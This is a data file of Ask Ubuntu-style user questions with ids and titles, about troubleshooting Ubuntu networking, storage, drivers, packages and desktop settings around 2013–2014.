405841	unable to bridge using openvpn on ubuntu 12.04 server	i set up an ubuntu server 12.04 lts in my lan and forwarded tcp port 1194 to it . openvpn-server is running , the client ( ubuntu 12.04 lts ) can connect . device tap0 is visible on client : tap0 link encap : ethernet hwaddr 2e : bd : e8 : ae : f7:3d inet addr:192.168.13.200 bcast:192.168.13.255 mask:255.255.255.0 inet6 addr : fe80 : :2cbd : e8ff : feae : f73d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:49 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 rx bytes:0 ( 0.0 b ) tx bytes:8445 ( 8.4 kb ) lan subnet is 192.168.13.x so obviously i got a proper ip-address . nevertheless i ca n't ping/ssh/whatever any other machine in the 192.168.13.x-lan : me @ myhost $ traceroute 192.168.13.1 traceroute to 192.168.13.1 ( 192.168.13.1 ) , 30 hops max , 60 byte packets 1 myhost.local ( 192.168.13.200 ) 2997.258 ms ! h 2997.207 ms ! h 2997.195 ms ! h me @ myhost $ ssh 192.168.13.1 ssh : connect to host 192.168.13.1 port 22 : no route to host me @ myhost : ~ $ ping 192.168.13.149 ping 192.168.13.149 ( 192.168.13.149 ) 56 ( 84 ) bytes of data . from 192.168.13.200 icmp_seq=1 destination host unreachable i added to the /etc/ufw/before.conf : # nat table rules *nat : postrouting accept [ 0:0 ] # allow traffic from openvpn client to eth0 -a postrouting -s 192.168.13.0/8 -o eth0 -j masquerade commit as well as /etc/openvpn/server.conf : port 1194 proto tcp dev tap0 server-bridge 192.168.13.1 255.255.255.0 192.168.13.200 192.168.13.220 push `` route 192.168.13.0 255.255.255.0 '' push `` dhcp-option dns 192.168.13.1 '' and /etc/network/interfaces : auto br0 iface br0 inet dhcp bridge_ports eth0 router ( dhcp-gateway ) is 192.168.13.1 vpn-server is : 192.168.13.149 did i miss something ? did i spoil any config ? : -/ thanks for your help !
405842	should i remove very old information from the ubuntu/community wiki ?	i 'm glad to find out that i should boldy edit the ubuntu and community wikis , including adding new info to old pages , and that there is even a way to request whole page deletions where necessary . however , what if a page contains some useful information , and some just plain old instructions ? you know those pages that include stuff about dapper and hardy and workarounds that ( thankfully ) we no longer need , thanks to those same brave souls who went before us . my instinct is that instructions for non-supported releases should not be on the latest revision of a wiki page . is there a policy for this ? if so , should the old instructions be deleted , archived , or something else ? if not , is there a preferred way to separate them out ?
405844	multiple key combinations for one command in compiz	i 'm trying to change the default behavior of super right/left arrow into that of ctrl super right/left arrow as well as ctrlalt4/6 . ctrl super right/left arrow is used to change the position and size of the active window so it will only take up half the screen ( this is called semi-maximization ) . the normal approach to do this is to go to system setting - > keyboard - > shortcuts - > windows and change the default shortcut into the desired shortcut , copy that shortcut and give it another key combination this is a compiz thing ( compiz grid ) so you have to edit it in ccsm which is fine . now the problem arises that you can not set the same command to multiple shortcuts . so when i set this command to ctrlalt4/6 ( which i use when i have a lot of windows that need to be managed across multiple monitors ) i can not set it to super right/left arrow ( which i use on the go for quick window management ) . how can i set a compiz command to multiple key-combinations ? is it perhaps possible to set a key combination to press another combination ? ? like this : press super left arrow -- > send keys ctrlalt4
405845	virt-manager pool not updating ( iscsi_discovery issue related ? )	i have an ubuntu 12.04lts server running kvm and san a with iscsi targets . i am having issues with the virt-mamager refreshing the list of volumes in the storage pool . i have tried pushing the refresh button in the gui and using the cli $ sudo virsh pool-refresh multipath_iscsi ( where multipath_iscsi above is the name of the pool ) history i created a new volume on the san and mapped it to a lun on the iscsi target ( all ok here ) on the ubuntu server i did ... ( i ) logout of the target $ sudo iscsiadm -- mode node -- portal=10.0.1.1 -- logout logging out of session [ sid : 28 , target : iqn.2xxx-xx. -- -eternus-dxl : cm0p0 , portal : 10.0.1.1,3260 ] logging out of session [ sid : 29 , target : iqn.2xxx-xx. -- -eternus-dxl : cm0p0 , portal : 10.0.1.1,3260 ] logout of [ sid : 28 , target : iqn.2xxx-xx. -- -eternus-dxl : cm0p0 , portal : 10.0.1.1,3260 ] : successful logout of [ sid : 29 , target : iqn.2xxx-xx. -- -eternus-dxl : cm0p0 , portal : 10.0.1.1,3260 ] : successful ( ii ) flush ( unused ) the multipaths $ sudo multipath -f ( iii ) rediscover the portal and log into iscsi target $ sudo iscsi_discovery 10.0.1.1 -l set target iqn.2xxxxxxxxxxxxdxl : cm0p0 to automatic login over tcp to portal 10.0.1.1:3260 iscsiadm : can not modify node/iface transport name while a session is using it . log out of the session then update the record can not login over tcp to portal 10.0.1.1:3260 iscsiadm : can not modify node/iface transport name while a session is using it . log out of the session then update the record can not login over tcp to portal 10.0.1.1:3260 discovered 2 targets at 10.0.1.1 ( iv ) recreate the multipath mappings $ sudo multipath -v2 create : mpath-name-vol1 ( long wwid ) undef fujitsu , eternus_dxl ... ( v ) rescan it iscsi $ sudo iscsiadm -- mode node -- rescan rescanning session [ sid : 20 , target : iqn.2xxxxxxxxxxx : dxl : cm1p0 , portal : 10.0.3.1,3260 ] rescanning session [ sid : 21 , target : iqn.2xxxxxxxxxxx : dxl : cm1p0 , portal : 10.0.3.1,3260 ] rescanning session [ sid : 38 , target : iqn.2xxxxxxxxxxx : dxl : cm0p0 , portal : 10.0.1.1,3260 ] rescanning session [ sid : 39 , target : iqn.2xxxxxxxxxxx : dxl : cm0p0 , portal : 10.0.1.1,3260 ] then repeat ( i ) to ( iv ) above for the second portal on 10.0.3.1 looking in /dev/ and /dev/mapper i see all of the correct multipaths dm 's and symlinks created $ ls -l /dev/ | grep `` dm '' brw-rw -- -- 1 root disk 252 , 2 jan 15 11:36 dm-2 brw-rw -- -- 1 root disk 252 , 2 jan 15 11:36 dm-49 brw-rw -- -- 1 root disk 252 , 2 jan 15 11:36 dm-5 brw-rw -- -- 1 root disk 252 , 2 jan 15 11:36 dm-53 ... $ ls -l /dev/mapper lrwxrwxrwx 1 root root 7 jan 15 11:36 mpath-name-vol1 - > ../dm-2 lrwxrwxrwx 1 root root 7 jan 15 11:36 mpath-name-vola - > ../dm-49 lrwxrwxrwx 1 root root 7 jan 15 11:36 mpath-name-volb - > ../dm-5 lrwxrwxrwx 1 root root 7 jan 15 11:36 mpath-name-volc - > ../dm-59 refresh the available volumes in virt-manager $ sudo virsh pool-refresh multipath_iscsi pool multipath_iscsi refreshed question : what have i missed ? how can i get the virt-manager to refresh the list of volumes available in the pool ?
405846	lvm logical volumes do not activate on boot on 13.10	i am running an ubuntugnome 13.10 and i set it up without an lvm during the installation process . i am now running it with to encrypted partitions , one is containing a lvm . this all works fine , except , that the logical volumes are not activated during startup . so i have to enter vgchange -a y after unlocking the encrypted partitions . what i tried so far : since /etc/udev/rules.d/85-lvm2.rules did not exist i tried : # cp /lib/udev/rules.d/85-lvm2.rules /etc/udev/rules.d/ # update-initramfs -u -k all as suggested here . but this did not solve my problem . i also tried to leave out 'env { id_fs_type } == '' lvm*|lvm* '' ' in 85-lvm2.rules and installed watershed without success . what might be connected : while i am entering my password to unlock the encrypted hard drive my computer tells me that is not able to mount the /var ( one of the logical volumes in the lvm ) update : this seems to be a problem in ubuntu , i found this and multiple bug reports concerning this jitos
405848	ubuntu 13.10 application using pyqt5	is it possible to make ubuntu application which will be fully functional in ubuntu mobile using pyqt5 . however i know that it s possible to make ubuntu application using qt ; what i 'm confused about is using pyqt . if so can you please provide me link to tutorial from where i can learn it . i have 5 years of experience in php .
405849	64-bit 12.04 with mtp phone	on my ubuntu precise 32-bit pcs , i added a ppa as follows : sudo add-apt-repository ppa : langdalepl/gvfs-mtp sudo apt-get update sudo apt-get upgrade the 32-bit pcs then work fine on picking up my android ics phone ( connected as mtp through usb cable ) . however , on my 64-bit pc , it does not pick up that phone . lsusb shows that it 's connected ok . the ppa 's owner says that the ppa is fine and suggests installing the 64-bit packages if they are not present . i 've done that with no improvement . i 've also tried purging the ppa and reinstalling . the ppa 's owner also says '' now that 13.10 is out with all of this functionality in it , i 'm not doing anything new with the ppa . '' . i have no intention of upgrading from an lts to a non-lts release . any ideas please ?
405850	netbeans ide 7.4 restart automatically . how to fix it ?	whenever i close netbeans ide , after a few seconds it starts again . how to fix this problem ? !
405852	installing .deb file without internet connection without software centre	i want to install os uninstaller i have its .deb file and the two other dependency files ( .deb ) required for it but when i try to install the dependency file in the liveusb the software center opens and the install button is grayed out , is there any other way ?
405855	wifi not working in ubuntu 13.04 on lenovo g430	i have lenovo g430 system in which my wireless card is bcm4312 . i just installed ubuntu 13.04 on my lenovo system along with windows 7 . all things are working properly except my wireless not detecting any wifi connection . from what i do till now is : when i write `` iwconfig '' on terminal it shows me `` no wireless found '' i tried to install my wireless driver using software update in system setting in the additional driver option . its shows my wireless but cant update it please help me regarding this issue . thanks in advance : )
405857	what is the difference between the *.ubuntu.com wikis ?	i realised i 'm a bit confused about something . i have found three separate wikis hosted at ubuntu.com , and i 'd like to know their respective purposes and relationships . i have some guesses ( see below ) but i 'd prefer some clear/official/de facto descriptions or links . official documentation ( https : //help.ubuntu.com ) my guess : the official wiki page for running x on ubuntu , where x is an officially supported package . community help wiki ( https : //help.ubuntu.com/community ) my guess : the public wiki page for running x on ubuntu , where x is any old thing . ubuntu wiki ( https : //wiki.ubuntu.com ) my guess : contributor-supported documentation for how to make contributions to the ubuntu platform itself ( not development for ubuntu ) . my primary interest here is in understand what they are so i can a ) use them for my own reference , b ) contribute to them if possible and c ) link to them from au ( where relevant )
405859	when exactly ssh-agent use my private_key to connect remote server ?	i need some basics about ssh , because i dont understand some little things that helps me understand the process of ssh connecting . i have ubuntu server on my virtualbox and ubuntu desktop on my host . i 've established connection with my vm by adding id_rsa.pub to authorized_keys on the remote ( added by ssh-copy-id ) . id_rsa.pub is generated by ssh-keygen as well as id_rsa . well..everything ok i successsfully connect to my remote without typing password , but i do n't understand when exactly and why need the file id_rsa which is stored along to id_rsa.pub ? i tried delete this private key , but in spite of this connection still works ! in my mind , this file does n't need to establish connection with my vm .
405861	custom keyboard shortcut not working in saucy	i 'm trying to set up a shortcut that will open the gnome-control-center to the display tab . the command for this is gnome-control-center display which works in a terminal and in the dash . i set up the custom keyboard shortcut in the settings > keyboard > shortcuts panel but no matter what i set as the shortcut , nothing happens . in the command , i tried to echo text into a file but nothing happens either . how should i set up my custom keyboard shortcut ?
405862	'trying to overwrite file already in shotwell-common package ' while installing shotwell from the ppa	i am trying to update my version of shotwell . well , my ubuntu system is . i am getting the following apt-get error . can anyone tell me how to resolve it ? i have tried a few different things so now asking for help . root @ nathanr-xps-630i : /home/nathanr # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : shotwell 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 10.8 mb of archives . after this operation , 25.5 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //ppa.launchpad.net/yorba/ppa/ubuntu/ saucy/main shotwell i386 0.15.1-1~saucy1 [ 10.8 mb ] fetched 10.8 mb in 2min 16s ( 79.5 kb/s ) ( reading database ... 316303 files and directories currently installed . ) preparing to replace shotwell 0.15.0-0ubuntu1 ( using ... /shotwell_0.15.1-1~saucy1_i386.deb ) ... unpacking replacement shotwell ... dpkg : error processing /var/cache/apt/archives/shotwell_0.15.1-1~saucy1_i386.deb ( -- unpack ) : trying to overwrite '/usr/share/icons/hicolor/24x24/apps/shotwell.svg ' , which is also in package shotwell-common 0.15.0-0ubuntu1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) no apport report written because maxreports is reached already processing triggers for software-center ... info : softwarecenter.db.update : translation information in database is up-to-date processing triggers for hicolor-icon-theme ... errors were encountered while processing : /var/cache/apt/archives/shotwell_0.15.1-1~saucy1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any suggestions what i need to do ?
405863	piping using ssh without having to relogin for every pipe	i have an ssh connection and i have to send some local files and output to the ssh server . i know i can do this using the following command tar zcf - stuff | ssh user @ server 'tar zxf -' i would like to set it up in sequence using the & & operator . i already have a connection and i do n't want to relogin for every pipe , since i 'll be using only one at a time . just to clarify i 'm not just moving tarballs over the network but also input from devices collected from time to time as the pipeline opens . just to stop people from saying : `` why do n't you use this program to move your file over the internet '' or `` you could also use a usb drive to transfer those files ''
405864	gnome-settings-daemon flickering ghost window	in ubuntu 12.04 , when i login through lightdm , a `` ghost '' window appears . this window does not show any content . instead it flickers its borders and move down vertically . when i xprop it , it reports to be wm_class ( string ) = `` gnome-settings-daemon '' , `` gnome-settings-daemon '' . i can get rid of the flickering ghost window by twice killing it : killall -9 gnome-settings-daemon killall -9 gnome-settings-daemon this stops the flickering window . restarting gnome-settings-daemon from the terminal i do not get a flickering window , but my .xsession-errors file reports : failed to create drawable compiz ( core ) - warn : glxcreatepixmap failed compiz ( core ) - warn : could n't bind background pixmap 0x3e00001 to texture compiz ( decor ) - warn : failed to bind pixmap to texture previous errors in .xsession-errors are : compiz ( decor ) - warn : failed to bind pixmap to texture compiz ( opengl ) - info : could n't bind redirected window 0xa0000b to texture what is happening ?
405869	how to set up voip in ubuntu	i am running a small business unit on agency recruitments . need to know about setting up a voip service to call usa/canada.. we have around 20 phones on line and we operate from bangalore . what tool/software is used for this ? ? what are the hardware requirements ? appreciate your help . alvin
405873	my micro sd cards size decreased after making it boot-able ?	i 've formated my frontech 2gb msd to make it a bootable msd.now i 've tried to format the msd but it shows the message error deleting the partition . moreover the 2gb got reduced to 832.5 mb total memory space . please help !
405874	sabertooth 990fx audio drivers ( kubuntu )	not sure if i 'm right here but i have a very hardware specific question . just installed kubuntu 13.10 on my gaming rig yesterday ( to play ksp on 64bit ; ) ) . and so far everything worked rather well ( not a linux pro here ) . however i 've been having trouble with my sound . as i mentioned in the title i 'm using the sabertooth 990fx audio controller with a normal set of 2.1 speakers . in addition to that i have a front panel connected to the motherboard where i plug in my 3,5mm analoge headset . in the system settings it displays me all sorts of audio output options , including some 5.1 and 7.1 ( that should n't exist ) but none of them in no configuration outputs anything on the speakers connected to the back . in addition i ca n't find any sound drivers in the list of `` additional drivers '' that it sugests me to install ( only two ati graphics drivers ) . hope someone can help me with this . asus does n't seem to have official linux drivers : c
405877	nvidia driver outdated , will the ppa help ? and what 's a ppa ?	hi i 'm a complete novice ( usually rely on my son for help ) . in one of the answers it mentions 'ppa ' . what is 'ppa ' ? if this problem is resolved will it stop the freezing as well ?
405883	ubuntu not detecting hard drive	i have 2 hard drives in my pc . with the windows installed on the slave . the ubuntu installer is not detecting the slave one , but only the master one and i wish to install it on the slave hard drive . i have already tried sudo su , and fdisk -l , but it wo n't work . although my both drives are working on windows 7 .
405891	wifi not working ( only for secure connections ) in ubuntu 12.04 for hp pavillion dv 6	i 'm facing to a big trouble to connect to my office wifi connection.because i ca n't connect to it due to a password protected connection.for my home one i can connect , because it 's an open one.i tried to connect to my android phone 's hotspot connection too.it also ca n't , because it 's password protected.please help me to solve this thanks
405893	can i use a usb hard drive as installation medium ?	i have a formatted usb-hd ( 500gb ) and want to make it an install device for an ubuntu lts version . how should i do this ?
405897	how can i import multiple .sql files into mysql ?	in my folder , i have a lot of *.sql files ... how via one command i can import them ? for example ; is something like this possible ? mysql -u root -p db_development < *.sql if not , how can i import every .sql file into mysql ?
405900	bumblebee hdmi not detected	i try to use my tv connecting on my pc using hdmi cable . i installed bumblebee . i launch `` lspci -v '' , and this is the ouput for my card : 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 525m ] ( rev ff ) ( prog-if ff ) ! ! ! unknown header type 7f 01:00.1 audio device : nvidia corporation gf108 high definition audio controller ( rev ff ) ( prog-if ff ) ! ! ! unknown header type 7f kernel driver in use : snd_hda_intel when i run `` xrandr '' , i 've got : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) so it 's seems that my nvidia card with hdmi port it 's not detected . and when i connect my tv , nothing happened . when i try to launch `` bumblebeed '' , this is the ouput : [ error ] invalid configuration : no driver configured . someone can help me resolve this problem please ? thank you
405904	wallch changing frequency resets automatically	i have been using the wallpaper changing utility wallch for quite some time and very happy with the experience . but recently the utility has started giving some trouble . no matter what i do , the frequency of changing the wallpapers always resets to the minimum value ( 10 secs ) automatically .
405905	clementine player showing wrong length for .mp3 while vlc shows correct length	all my music in in .mp3 files . the problem is that the length shows up wrong in clementine music player ( too long ) . its shows up fine in vlc player and banshee . this makes me think that the .mp3 files are all fine and clementine is the actually broken . how can i make clementine show the correct length . i tried this , but did not work : sudo apt-get install mp3val cd music mp3val *.mp3 -f -t i tried the solutions posted to these problems . how can i fix incorrect mp3 duration ? ripped mp3 files show wrong track lengths
405911	setting up fujitsu-fi60f scanner with ubuntu 12.04	i have installed ubuntu 12.04 lts . when i use sane-find-scanner command , it detects the fujitsu scanner , but when i use scanimage -l , it does not detect the scanner . i tried copying the *.nal file into /usr/share/sane/epjitsu folder and modified the config file but still it does not work .
405912	should system packages be removed manually or will they be removed automatically ?	there are old versions of some system packages for : header files related to linux kernel version 3.11.0 linux kernel headers for version 3.11.0 on 64 bit x86 smp linux kernel extra modules for version 3.11.0 on 64 bit x86 smp i selected them which could be seen in the screenshot and they are 516 mb in total . should i remove them manually or will they be removed automatically later ? if they are not necessary , which command ( s ) will remove just old versions of multiple packages completely ?
405916	open a window in a remote machine	is there a way to open a window in a remote machine via ssh ? i know that ssh -x redirects to my local remote windows but is there a way to open that windows in the remote machine and keep it alive after disconect ( open it in a local-logged user ) ? the problem is that i 've change the amule.conf file to a familiar ( because he ca n't find .amule/incoming , you know , i had to change the home directory path ) an amule should be restarted ( he has it opened in his desktop ) . i only know how to kill the application and after it get x 's in my local ( that will be close with my connection : no cool ) or let the daemon ( amuled ) in background but , if i launch the daemon , he will get an 'process already running ' error when he tries to open again amule ( if he dont see the window he 'll think that its closed ) and i 'll get another telephone call ... is ther a way to open it and let it in his desktop ?
405917	error in disk partitioning during ubuntu server 12 installing	i 'm installing ubuntu server-12 on my computer that has a 2 ghz intel processor , 2 gb ram and 160 gb sata hard drive . i 'm installing from a cd . everything goes fine ; however when i get to partitioning the hard drive , i get this ( i 'd post the image , but ask ubuntu does n't let me yet ) : [ ! ! ] partition disks ? ? ? ? ? ?
405922	copy a date from the calender in top bar	i have already seen this question . however , this allows you to copy ( and paste ) only the current date . let us say that you have displayed the calender in your top bar . then you select a particular date ( not the current date ) by clicking on it . how do i copy the selected date so that it can be subsequently pasted ? ( if the above can not be done , is there a particular tool or chain of commands which can be used for the purpose ? )
405923	how to save display configuration after super+p ?	when i switch display settings by pressing super+p , the original settings are not saved and i have to reconfigure that my second monitor is above my first monitor . is there a way to fix this ?
405924	does contributing on ask ubuntu help me to become an ubuntu member ?	can i become an ubuntu member from earning reputation on ask ubuntu ? if i can , is there a minimum reputation i need to achieve ? is asking and answering a good way or is something else required ?
405926	samba can not share folder - can not convert name `` everyone '' to a sid	after successful samba sharing already few days ago i have the same thing today yet i have received the following error : 'net usershare ' returned error 255 : net usershare add : can not convert name `` everyone '' to a sid . the connection was refused . maybe smbd is not running . when trying to start/restart samba service i get the following $ sudo service samba status * nmbd is running * smbd is not running $ sudo service samba start $ sudo service samba restart $ sudo service samba status * nmbd is running * smbd is not running my /var/log/samba/smbd.log [ 2014/01/15 16:21:46 , 0 ] smbd/server.c:1072 ( main ) smbd version 3.6.18 started . copyright andrew tridgell and the samba team 1992-2011 [ 2014/01/15 16:21:46.426302 , 0 ] smbd/server.c:1128 ( main ) standard input is not a socket , assuming -d option [ 2014/01/15 16:21:46.428538 , 0 ] auth/auth_util.c:708 ( get_guest_info3 ) saminfo3_for_guest : unable to locate guest account [ guest ] ! [ 2014/01/15 16:21:46.428578 , 0 ] smbd/server.c:1251 ( main ) error : failed to setup guest info . my /etc/samba/smb.conf $ grep -e `` ^ [ ^ # ; ] . * '' /etc/samba/smb.conf [ global ] workgroup = workgroup server string = % h server ( samba , ubuntu ) dns proxy = no log file = /var/log/samba/log. % m max log size = 1000 syslog = 0 panic action = /usr/share/samba/panic-action % d encrypt passwords = true passdb backend = tdbsam obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . pam password change = yes map to guest = bad user usershare allow guests = yes username map = /etc/samba/smbusers security = user guest ok = yes ; guest account = nobody usershare max shares = 100 usershare owner only = false
405928	no results for music in unity-dash	i 'm running ubuntu 13.10 and was curious about the smart-scopes feature . videos , applications and photos works fine , but unfortunately my music collection from gmusicbrowser is not displayed ... yes , the gmusicbrowser-plugin is installed and activated ... if i switch to the music-section in the dash there 's always there is no music on this computer ( do n't know if these are the exact words , since i 'm using the german version ) . however i do have a lot of music on my computer . banshee seems to work sometimes , so does rhythmbox ... but i really would like to have my gmusicbrowser collection in the dash
405931	how to set up dbus query to get play state of vlc ?	i 'm experiencing this problem where vlc continues to inhibit the power management daemon even after playback has ended ( even though the option in the vlc preferences is labeled `` inhibit the power management daemon during playback '' ) . i asked in the vlc forum but got no reply . i 've considered manually compiling the latest development release of vlc in order to fix this issue but i 'm not sure i want to go there or if this would even resolve the issue . one answer suggests setting up a dbus query to get the play state of vlc and killing the process when it 's done playing . how would one go about setting up such a dbus query ? my system is running vlc 2.0.9 from ppa : videolan/stable-daily on ubuntu 12.04 lts and all of the installed packages are updated to the latest versions . thanks .
405933	how to manually remove a bad email message in evolution	i am using evolution in ubutu 12.04 lts . i seem to have gotten a bad email message- when i opened it and ctrl-i to see the images , evolution hung up as it was `` formatting message '' and then hung up completely . now whenever i click on that message in my inbox ( i desperately want to delete it ) , same thing- lower bar say `` formatting message '' , and all of evolution grays out and hangs . since clicking on this message to delete it immediately crashes evolution , is there any other way to manually delete this message from by inbox ? thanks for any help you can offer . update- never mind ! after over one hour of trying different approaches , suddenly and through no result of my own efforts , this email message did not crash evolution when clicked , so i could just delete it the usual way . if anyone has suggestions , i would be very curious as to why this behavior and why it resolved on its own . thanks !
405937	2 added nodes to maas server but their state does not change from `` commissioning '' to `` ready '' !	i have added two nodes to a maas server ( which is deployed on a separate 3rd node ) but the nodes never change their state from `` commissioning '' to `` ready '' ... some additionally details , please let me know if you need more details : primarily , on both nodes windows is pre-installed on the server node , which hosts maas , windows and ubuntu server 12.04.3 lts is pre-installed to enlist the nodes to the maas server , i boot the nodes from an usb boot stick which contains the same operating system sources as the maas-server-node , i.e ubuntu server 12.04.3 lts
405939	unable to locate package libmysql++-dev	root @ avidgamers : ~/warcraft/ag-hostbotru/ghost # apt-get install libmysql++-dev reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libmysql++-dev e : could n't find any package by regex 'libmysql++-dev' root @ avidgamers : ~/warcraft/ag-hostbotru/ghost # os : ubuntu lts 12.04 64bit i 've been able to install this package on numerous other servers , but it is n't downloading this package on this new server . i can , however , download and install other packages that i need . it may not make a difference , but the server is located in moscow , russia .
405940	how to mount a partially damaged disk in an ubuntu livecd boot	sudeenly a friend 's windows disk stop working ( when you trying to boot it , you can see the message : non-system disk or disk error replace and strike any key when ready . so i booted from a ubuntu 's livecd and expected to get her disk mounted . well , it did n't ... so , what i want to do is to acces this disk data to recover the files . could you please help me ? the problem is that this disk is n't in fstab and when i look inside /dev what i see is : ./by-id : total 0 drwxr-xr-x 2 root root 120 ene 15 10:29 . drwxr-xr-x 6 root root 120 ene 15 10:29 .. lrwxrwxrwx 1 root root 9 ene 15 10:30 ata-fujitsu_mhw2120bh_nz1dt7730d0k - > ../../sda lrwxrwxrwx 1 root root 9 ene 15 10:30 ata-tsstcorp_cddvdw_ts-l632h - > ../../sr0 lrwxrwxrwx 1 root root 9 ene 15 10:30 usb-kingston_datatraveler_2.0_5b830900004b-0:0 - > ../../sdb lrwxrwxrwx 1 root root 10 ene 15 10:30 usb-kingston_datatraveler_2.0_5b830900004b-0:0-part1 - > ../../sdb1 ./by-label : total 0 drwxr-xr-x 2 root root 60 ene 15 10:29 . drwxr-xr-x 6 root root 120 ene 15 10:29 .. lrwxrwxrwx 1 root root 10 ene 15 10:30 pendrive - > ../../sdb1 ./by-path : total 0 drwxr-xr-x 2 root root 80 ene 15 10:29 . drwxr-xr-x 6 root root 120 ene 15 10:29 .. lrwxrwxrwx 1 root root 9 ene 15 10:30 pci-0000:00:1d.7-usb-0:2:1.0-scsi-0:0:0:0 - > ../../sdb lrwxrwxrwx 1 root root 10 ene 15 10:30 pci-0000:00:1d.7-usb-0:2:1.0-scsi-0:0:0:0-part1 - > ../../sdb1 ./by-uuid : total 0 drwxr-xr-x 2 root root 80 ene 15 10:29 . drwxr-xr-x 6 root root 120 ene 15 10:29 .. lrwxrwxrwx 1 root root 10 ene 15 10:30 7482-7c6a - > ../../sdb1 lrwxrwxrwx 1 root root 11 ene 15 10:30 90951fb7-d63c-415a-bed2-1a6ca944f428 - > ../../loop1 as you can see the 'ata-fujitsu_ ... .. ' can be seem by id , but not by label , path nor uuid - and the bad thing is that i 'm a noob and do n't know how to mount disks `` by id '' . also , when i try the `` gui smart test tool '' it says that faild to that disk . some extra data that might be useful : sudo fdisk -lu : disco /dev/sda : 120.0 gb , 120034123776 bytes 255 cabezas , 63 sectores/pista , 14593 cilindros , 234441648 sectores en total unidades = sectores de 1 * 512 = 512 bytes tamaño de sector ( lógico / físico ) : 512 bytes / 512 bytes tamaño e/s ( mínimo/óptimo ) : 512 bytes / 512 bytes identificador del disco : 0x570a7939 disposit . inicio comienzo fin bloques id sistema disco /dev/sdb : 4005 mb , 4005560320 bytes 255 cabezas , 63 sectores/pista , 486 cilindros , 7823360 sectores en total unidades = sectores de 1 * 512 = 512 bytes tamaño de sector ( lógico / físico ) : 512 bytes / 512 bytes tamaño e/s ( mínimo/óptimo ) : 512 bytes / 512 bytes identificador del disco : 0x0007e6ff disposit . inicio comienzo fin bloques id sistema /dev/sdb1 * 63 7823359 3911648+ b w95 fat32 sudo blkid : /dev/loop0 : type= '' squashfs '' /dev/loop1 : uuid= '' 90951fb7-d63c-415a-bed2-1a6ca944f428 '' type= '' ext3 '' /dev/sdb1 : label= '' penedrive '' uuid= '' 7482-7c6a '' type= '' vfat ''
405942	crashplan app not launching	it is a very similar problem to that described here : crashplan not starting . fails to find swt-gtk however i have not succeded at resolving this issue . the error i get in /usr/local/crashplan/log/ui_output.log after i launch the crashplandesktop command to run the gui for crashplan is the following [ 01.15.14 15:46:41.556 error main root ] failed to launch cpdesktop ; java.lang.unsatisfiedlinkerror : could not load swt library . reasons : ca n't load library : /tmp/.cpswt/libswt-gtk-4234.so ca n't load library : /tmp/.cpswt/libswt-gtk.so no swt-gtk-4234 in java.library.path no swt-gtk in java.library.path /tmp/.cpswt/libswt-gtk-4234.so : /tmp/.cpswt/libswt-gtk-4234.so : failed to map segment from shared object : operation not permitted the output of locate swt-gtk is : /usr/lib/java/swt-gtk-3.7.2.jar /usr/lib/jni/libswt-gtk-3740.so /usr/share/doc/libswt-gtk-3-java /usr/share/doc/libswt-gtk-3-jni /usr/share/doc/libswt-gtk-3-java/readme.debian /usr/share/doc/libswt-gtk-3-java/readme.gz /usr/share/doc/libswt-gtk-3-java/changelog.debian.gz /usr/share/doc/libswt-gtk-3-java/copyright /usr/share/doc/libswt-gtk-3-jni/changelog.debian.gz /usr/share/doc/libswt-gtk-3-jni/copyright /usr/share/java/swt-gtk-3.7.jar /usr/share/java-config/libswt-gtk-3-java /usr/share/lintian/overrides/libswt-gtk-3-java /var/cache/apt/archives/libswt-gtk-3-java_3.7.2-2_amd64.deb /var/cache/apt/archives/libswt-gtk-3-jni_3.7.2-2_amd64.deb /var/lib/dpkg/info/libswt-gtk-3-java.list /var/lib/dpkg/info/libswt-gtk-3-java.md5sums /var/lib/dpkg/info/libswt-gtk-3-java.postinst /var/lib/dpkg/info/libswt-gtk-3-java.prerm /var/lib/dpkg/info/libswt-gtk-3-jni.list
405946	avoid callin automatically grub-install when installing grub	somehow when installing grub for ubuntu in this way : debian_frontend=noninteractive apt-get -y -- force-yes install grub grub-install is called automatically and that procedure prompts the user for the device where to install grub . i want to call grub-install manually without being prompt . is there any way to do this ? alternatively , is there any way to specify the device in which grub is going to be installed without being prompt ?
405948	mouse and keyboard not working at boot - ubuntu 12.04 & 13.10	mouse and keyboard not working ubuntu 12.04 at boot ... this is a new install , and the keyboard and mouse worked when installing from the disk . if they are unplugged , and then plugged in , they work . but when booting with them plugged in , they refuse to work . the system ran ubuntu 12.04 before , but the hard drive broke , so just a re-install from a new downloaded disc , which i have done twice to double check , and made two cds and even a flash drive . the usb legacy is set , and i tried resetting to defaults . the same problem also now occurs in installed ubuntu 13.10 os . i have tried in other os windows 7 , mint 13 , and keyboard and mouse work fine . also tried different keyboards and mouse and usb sockets pc spec biostar board n68s3 +ver6.1 12.04 64 bit ( now 13.10 ) amd sampron 45 processor 6gb memory g210 nvidia grapics card thanks
405949	unable to configure wireless/bluetooth on laptop	i have an hp compaq nx7400 laptop that has previously been running windows 7 . since i have an additional pc with windows 7 that serves as my main tool , i have decided to try the latest ubuntu 13.10 on the laptop , and have installed it from a dvd as a complete replacement for my previous os . linux is now the sole os running on the laptop . however i have a few problems that i ca n't solve - i should point out that i am new to linux . 1 ) the laptop 's bluetooth can not be turned on . linux states that it is turned off by a hardware switch , which is true - there is a bluetooth switch on the device , however no matter what i do the switch does not respond to being pressed at all . note : bluetooth was working on windows 7 just yesterday and i have always kept it turned on . 2 ) i can not connect to my wireless router . enable networking is on if you click on the wifi icon up in the status bar . however , when going to system settings and clicking network , the new window opens only for a split second and then instantly closes , too fast to even read what it says . i have tried about a dozen times . 3 ) i ca n't get the mac address through 